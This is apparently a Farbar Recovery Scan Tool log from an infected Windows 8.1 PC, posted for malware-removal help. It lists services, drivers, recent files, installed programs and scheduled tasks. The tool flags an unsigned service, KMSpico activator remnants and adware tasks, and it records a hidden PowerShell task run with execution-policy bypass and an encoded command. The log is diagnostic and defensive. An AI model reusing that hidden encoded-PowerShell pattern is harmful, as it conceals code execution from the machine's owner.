R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [239696 2013-07-23] ()
R2 Nonchalant Necessary; C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe [8016666 2015-06-17] () [File not signed] <==== ATTENTION
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635672 2014-05-22] (Wacom Technology, Corp.)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 athr; C:\Windows\system32\DRIVERS\athwnx.sys [3680256 2013-06-18] (Qualcomm Atheros Communications, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131584 2013-08-22] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32640 2013-08-22] (Microsoft Corporation)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R3 dtscsibus; C:\Windows\system32\DRIVERS\dtscsibus.sys [29696 2015-01-11] (Disc Soft Ltd)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [256000 2015-01-19] (Huawei Technologies Co., Ltd.)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2015-01-19] (Huawei Technologies Co., Ltd.)
S3 t_mouse.sys; C:\Windows\system32\DRIVERS\t_mouse.sys [6144 2013-04-09] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
S3 moufiltr; \SystemRoot\System32\drivers\moufiltr.sys [X]
S3 vhidmini; \SystemRoot\System32\drivers\walvhid.sys [X]
S3 WinDivert1.1; \??\C:\Program Files\KMSpico\WinDivert.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:26 - 2016-02-03 00:26 - 00015307 _____ C:\Users\Neki\Desktop\FRST.txt
2016-02-03 00:25 - 2016-02-03 00:26 - 00000000 ____D C:\FRST
2016-02-03 00:24 - 2016-02-03 00:24 - 02370560 _____ (Farbar) C:\Users\Neki\Desktop\FRST64.exe
2016-02-02 23:55 - 2016-02-02 23:55 - 00001978 _____ C:\Users\Neki\Desktop\JRT.txt
2016-02-02 23:46 - 2016-02-02 23:46 - 01609032 _____ (Malwarebytes) C:\Users\Neki\Desktop\JRT.exe
2016-02-02 23:35 - 2016-02-02 23:39 - 00003416 _____ C:\Users\Neki\Desktop\AdwCleaner LOG.txt
2016-01-30 17:11 - 2016-01-30 17:11 - 00002264 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-30 17:11 - 2016-01-30 17:11 - 00002235 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-30 17:06 - 2016-01-30 17:10 - 45847120 _____ (Google Inc.) C:\Users\Neki\Downloads\ChromeStandaloneSetup.exe
2016-01-30 13:59 - 2016-02-03 00:04 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-30 13:59 - 2016-02-02 23:37 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-30 13:59 - 2016-01-30 13:59 - 00003880 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-01-30 13:59 - 2016-01-30 13:59 - 00003644 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-30 13:58 - 2016-01-30 13:59 - 00987728 _____ (Google Inc.) C:\Users\Neki\Downloads\ChromeSetup.exe
2016-01-30 12:51 - 2016-01-30 12:52 - 00000000 ____D C:\Users\Neki\AppData\Local\Deployment
2016-01-30 12:51 - 2016-01-30 12:51 - 00000000 ____D C:\Users\Neki\AppData\Local\Apps\2.0
2016-01-30 03:06 - 2016-01-30 03:06 - 94824363 _____ C:\Users\Neki\Desktop\MarcelinesHouse_Regular_Windows_0_5_1.zip
2016-01-30 00:13 - 2016-01-30 00:14 - 05216656 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-29 23:37 - 2016-01-29 23:37 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Sun
2016-01-29 23:37 - 2016-01-29 23:37 - 00000000 ____D C:\Users\Neki\.oracle_jre_usage
2016-01-29 23:32 - 2016-01-29 23:32 - 00000000 ____D C:\Users\Neki\AppData\LocalLow\Oracle
2016-01-26 23:32 - 2016-02-01 22:33 - 00000868 _____ C:\Users\Neki\Desktop\Vocabulary List.txt
2016-01-25 03:59 - 2016-02-02 17:18 - 00000339 _____ C:\Users\Neki\Desktop\last night.txt
2016-01-23 13:55 - 2016-01-23 13:55 - 01505280 _____ C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
2016-01-19 22:56 - 2016-01-19 23:10 - 259447553 _____ C:\Users\Neki\Desktop\David Firth _ Heroes of Animation with Bing.mp4
2016-01-19 20:29 - 2016-01-29 22:25 - 00000000 ____D C:\ProgramData\{293c6f85-1064-1}
2016-01-19 20:29 - 2016-01-19 20:29 - 00019342 _____ C:\Windows\System32\Tasks\{FA5771BF-F746-C238-6653-39E53BF5AD97}
2016-01-19 20:29 - 2016-01-19 20:29 - 00000000 ____D C:\ProgramData\{11322393-4064-0}
2016-01-18 02:03 - 2016-01-18 03:30 - 03944774 _____ C:\Users\Neki\Desktop\Weiss Side Braid.psd
2016-01-15 17:17 - 2016-01-16 01:53 - 00000212 _____ C:\Users\Neki\Desktop\I'm that Kind of artist.txt
2016-01-14 16:19 - 2016-01-14 16:19 - 00000000 ____D C:\Users\Neki\Downloads\Archives
2016-01-14 16:18 - 2016-01-14 16:18 - 00000000 ____D C:\Users\Neki\Downloads\Torrent Files
2016-01-14 03:16 - 2016-01-14 17:07 - 00000000 ____D C:\Users\Neki\Desktop\DH
2016-01-14 00:10 - 2015-01-19 16:53 - 00999936 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00256000 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbnet.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00196608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00121600 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00093696 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00085504 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00055296 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00029184 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00013952 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2016-01-12 23:53 - 2016-02-01 21:30 - 01681993 _____ C:\Users\Neki\Desktop\Weiss Schnee Practice.psd
2016-01-08 15:40 - 2016-01-14 03:16 - 3023442527 _____ C:\Users\Neki\Desktop\My Little Pony Equestria Girls Rainbow Rocks (1080p)
2016-01-08 11:41 - 2016-01-08 17:33 - 00000000 ____D C:\Users\Neki\Desktop\My Little Pony Equestria Girls (2013) [1080p] {5.1}
2016-01-07 16:24 - 2016-01-15 00:26 - 00000124 _____ C:\Users\Neki\Desktop\LATEST LATEST ZELDA.txt
2016-01-05 13:38 - 2016-01-05 13:39 - 00000092 _____ C:\Users\Neki\Desktop\Marcelee.txt
2016-01-05 00:59 - 2016-01-05 00:59 - 01002019 _____ C:\Users\Neki\Desktop\Ciri.psd
2016-01-04 13:17 - 2016-01-08 02:07 - 01172758 _____ C:\Users\Neki\Desktop\Gwen Stacy Sketchdump2.psd
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:17 - 2014-03-18 18:04 - 00992970 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-03 00:17 - 2013-08-22 21:36 - 00000000 ____D C:\Windows\Inf
2016-02-02 23:37 - 2013-08-22 22:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-02 23:36 - 2013-08-22 21:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-02-02 23:35 - 2015-07-01 15:53 - 00000000 ____D C:\AdwCleaner
2016-02-02 23:22 - 2015-01-16 19:07 - 00000000 ____D C:\Users\Neki\AppData\Roaming\vlc
2016-02-02 02:01 - 2015-01-24 08:34 - 00000000 ____D C:\Users\Neki\AppData\Local\Adobe
2016-02-01 19:06 - 2015-01-06 22:47 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1800402837-2610492725-117470784-1001
2016-02-01 11:33 - 2015-01-06 13:22 - 00000000 ____D C:\Users\Neki
2016-01-31 22:44 - 2015-11-25 00:11 - 00002898 _____ C:\Users\Neki\Desktop\Things to do PC Edition.txt
2016-01-31 22:42 - 2015-09-06 00:35 - 00001481 _____ C:\Users\Neki\Desktop\Things I Wanna Animate.txt
2016-01-31 01:36 - 2015-11-19 15:43 - 00000380 _____ C:\Users\Neki\Desktop\GAMES TO PLAY.txt
2016-01-30 17:35 - 2015-01-22 22:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-30 17:35 - 2015-01-22 22:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-30 17:10 - 2015-01-07 14:20 - 00000000 ____D C:\Program Files (x86)\Google
2016-01-29 23:38 - 2015-03-17 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-29 23:38 - 2015-03-17 10:05 - 00000000 ____D C:\ProgramData\Oracle
2016-01-29 23:38 - 2015-03-17 10:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-29 23:37 - 2015-03-17 10:06 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-29 22:24 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\system32\NDF
2016-01-25 01:09 - 2015-01-10 15:41 - 00000000 ____D C:\Users\Neki\Desktop\Sci-Chris
2016-01-23 14:33 - 2015-06-20 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Portal
2016-01-23 14:33 - 2015-01-17 12:11 - 00000000 ____D C:\Windows\Minidump
2016-01-23 14:33 - 2015-01-08 18:04 - 00000000 ____D C:\Users\Neki\AppData\Roaming\uTorrent
2016-01-23 13:34 - 2015-02-09 11:40 - 00002520 _____ C:\Users\Neki\Desktop\What I want to Draw.txt
2016-01-18 04:18 - 2015-12-20 19:36 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Stellarium
2016-01-16 01:55 - 2015-11-02 19:49 - 00000228 _____ C:\Users\Neki\Desktop\Make memes.txt
2016-01-15 02:57 - 2015-09-14 20:07 - 00000403 _____ C:\Users\Neki\Desktop\Star x Marco Comic.txt
2016-01-14 00:55 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\LiveKernelReports
2016-01-12 23:11 - 2015-01-06 13:22 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Adobe
2016-01-09 00:08 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2016-01-08 01:37 - 2016-01-01 21:59 - 00000424 _____ C:\Users\Neki\Desktop\LATEST.txt
2016-01-07 15:04 - 2015-11-28 01:25 - 00000881 _____ C:\Users\Neki\Desktop\Things I was doing last night.txt
2016-01-04 18:26 - 2016-01-02 19:28 - 00000000 ____D C:\Users\Neki\Desktop\Hotel Transylvania 2 (2015)
 
==================== Files in the root of some directories =======
 
2015-02-14 18:24 - 2016-01-03 00:48 - 0000132 _____ () C:\Users\Neki\AppData\Roaming\Adobe PNG Format CC Prefs
2015-11-10 23:40 - 2015-11-10 23:41 - 0002292 _____ () C:\Users\Neki\AppData\Roaming\ASSDraw3.cfg
2015-03-09 19:24 - 2015-03-09 19:24 - 0000038 ___SH () C:\Users\Neki\AppData\Local\69ff07055291669bb2b218.72821112
2015-03-09 19:32 - 2015-03-09 19:32 - 0000038 ___SH () C:\Users\Neki\AppData\Local\70149b02515b3bb20dd492.47983420
2015-06-22 21:44 - 2015-06-22 21:44 - 212588673 _____ () C:\Users\Neki\AppData\Local\ACCCx3_1_1_110.zip.aamdownload
2015-06-22 21:44 - 2015-06-22 21:44 - 0002489 _____ () C:\Users\Neki\AppData\Local\ACCCx3_1_1_110.zip.aamdownload.aamd
2015-05-11 23:37 - 2015-05-11 23:37 - 0000000 _____ () C:\Users\Neki\AppData\Local\Temp.dat
2015-06-30 21:43 - 2015-06-30 21:43 - 0000000 _____ () C:\Users\Neki\AppData\Local\{E0FA8E34-A2F1-407A-ADD4-5109F5A129FB}
2015-11-26 15:00 - 2015-11-26 15:01 - 0000000 _____ () C:\Users\Neki\AppData\Local\{E6810BF9-BD15-4360-86AC-19DD1836CFF5}
 
Some files in TEMP:
====================
C:\Users\Neki\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\Neki\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-01 19:51
 
==================== End of FRST.txt ============================

 

 

[4] Addition =========================================================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-01-2016

Ran by Neki (2016-02-03 00:27:02)
Running from C:\Users\Neki\Desktop
Windows 8.1 Pro (X64) (2015-01-06 05:22:00)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1800402837-2610492725-117470784-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1800402837-2610492725-117470784-1002 - Limited - Enabled)
Guest (S-1-5-21-1800402837-2610492725-117470784-501 - Limited - Disabled)
Neki (S-1-5-21-1800402837-2610492725-117470784-1001 - Administrator - Enabled) => C:\Users\Neki
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.245 - Adobe Systems Incorporated)
Adobe Flash Professional CC (HKLM-x32\...\{B56B95BF-7161-4166-8288-DB1BA9F6C9B8}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Adobe Update Management Tool (HKLM-x32\...\{534A7A1A-7102-4AF6-23EA-7CD279C7B625}_is1) (Version: 6.2 - PainteR)
Aegisub 3.2.2 (HKLM\...\{24BC8B57-716C-444F-B46B-A3349B9164C5}_is1) (Version: 3.2.2 - Aegisub Team)
Audacity 2.1.0 (HKLM-x32\...\Audacity_is1) (Version: 2.1.0 - Audacity Team)
CCleaner (HKLM\...\CCleaner) (Version: 5.07 - Piriform)
Construct 2 r194.2 (HKLM\...\Construct 2_is1) (Version: 1.0.194.2 - Scirra)
DAEMON Tools Ultra (HKLM-x32\...\DAEMON Tools Ultra) (Version: 2.3.0.0254 - Disc Soft Ltd)
Encarta Search Bar (64-bit) (HKLM\...\{08044040-959A-4B0D-8825-2C533F0DDB19}) (Version: 1.0.0 - Microsoft)
EPSON L210 Series Printer Uninstall (HKLM\...\EPSON L210 Series) (Version:  - SEIKO EPSON Corporation)
ESBUnitConv (HKLM-x32\...\ESBUnitConv4_is1) (Version: 7.4.0.0 - ESB Consultancy)
Free File Viewer 2014 (HKLM-x32\...\FreeFileViewer_is1) (Version: 2014.2.16.0 - Bitberry Software) <==== ATTENTION
Free Studio version 6.5.3.713 (HKLM-x32\...\Free Studio_is1) (Version: 6.5.3.713 - DVDVideoSoft Ltd.)
GeoGebra 5 (HKLM-x32\...\GeoGebra 5) (Version: 5.0.168.0 - International GeoGebra Institute)
Globe Tattoo Broadband (HKLM-x32\...\Globe Tattoo Broadband) (Version: 21.005.11.00.158 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Java 8 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218071F0}) (Version: 8.0.710.15 - Oracle Corporation)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EF-DBBC016C6CB2}) (Version: 2.0 - Microsoft)
Macromedia Shockwave Player (HKLM-x32\...\Macromedia Shockwave Player) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2007 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student 2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version:  - )
Microsoft Student with Encarta Premium 2009 (HKLM-x32\...\{09041881-2C94-4A67-8E55-8483C019C7D2}) (Version: 2009 - Microsoft Corporation)
Microsoft Text-to-Speech Engine 4.0 (English) (HKLM-x32\...\MSTTS) (Version:  - )
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft1.8.3 (HKLM-x32\...\Minecraft1.8.3) (Version:  - )
Mobile Broadband HL Service (HKLM-x32\...\Mobile Broadband HL Service) (Version: 22.001.22.00.158 - Huawei Technologies Co.,Ltd)
Movavi Screen Capture Studio 5 (HKLM-x32\...\Movavi Screen Capture Studio 5) (Version: 5.0.0 - MOVAVI)
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 35.0 - Mozilla)
Mp3tag v2.70 (HKLM-x32\...\Mp3tag) (Version: v2.70 - Florian Heidenreich)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Stellarium 0.14.1 (HKLM\...\Stellarium_is1) (Version: 0.14.1 - Stellarium team)
Unity Web Player (HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\UnityWebPlayer) (Version: 4.6.1f1 - Unity Technologies ApS)
Virtua Fighter 2 V1.0E (HKLM-x32\...\Virtua Fighter 2) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-6 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.rar GmbH)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.3-0 - Bitnami)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {870FA402-396D-4013-938C-B6C5F3010F22} - System32\Tasks\{B2982742-0A9E-4457-8B9F-01ACD6242E6E} => pcalua.exe -a "C:\Program Files (x86)\bestadblocker\gKdQruQljZApDw.exe" -c /s /n /i:"ExecuteCommands;UninstallCommands" ""
Task: {9D9E7CB3-BEB0-4E79-899C-4E979C02D52D} - System32\Tasks\{FA5771BF-F746-C238-6653-39E53BF5AD97} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand
Task: {B25F6F74-882E-44F3-A3DA-2FAAE4D0989B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.)
Task: {B92B5DAA-D739-4F53-BB4B-C6A20DDF0DFF} - System32\Tasks\AdobeAAMUpdater-1.0-Win8PC-Neki => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-04-28] (Adobe Systems Incorporated)
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {DBE3644E-7F05-4F00-AF58-99FC700CF56A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.)
Task: {E2D593D0-5184-48FE-963C-CF929CC7C157} - \AutoPico Daily Restart -> No File <==== ATTENTION
Task: {FD516D4F-99E4-4476-8B9E-A27371DD8C0A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-06-02] (Piriform Ltd)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk -> C:\Users\Neki\AppData\Roaming\.minecraft\minecraft launcher\Debug.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-01-09 20:17 - 2010-01-09 20:17 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 08794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 00218624 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
2010-11-16 21:38 - 2010-11-16 21:38 - 00339456 _____ () C:\ProgramData\DatacardService\HWDeviceService64.exe
2015-02-01 22:07 - 2013-07-23 11:47 - 00239696 _____ () C:\ProgramData\MobileBrServ\mbbservice.exe
2015-06-17 21:11 - 2015-06-17 21:10 - 08016666 _____ () C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe
2015-01-19 16:54 - 2015-01-19 16:53 - 00011362 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\mingwm10.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 00043008 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\libgcc_s_dw2-1.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 02415104 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtCore4.dll
2015-01-19 16:54 - 2015-01-19 16:53 - 01148416 _____ () C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\QtNetwork4.dll
2010-01-09 20:18 - 2010-01-09 20:18 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:34 - 2010-01-21 01:34 - 08793952 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-01-30 17:11 - 2016-01-28 01:39 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libglesv2.dll
2016-01-30 17:11 - 2016-01-28 01:39 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libegl.dll
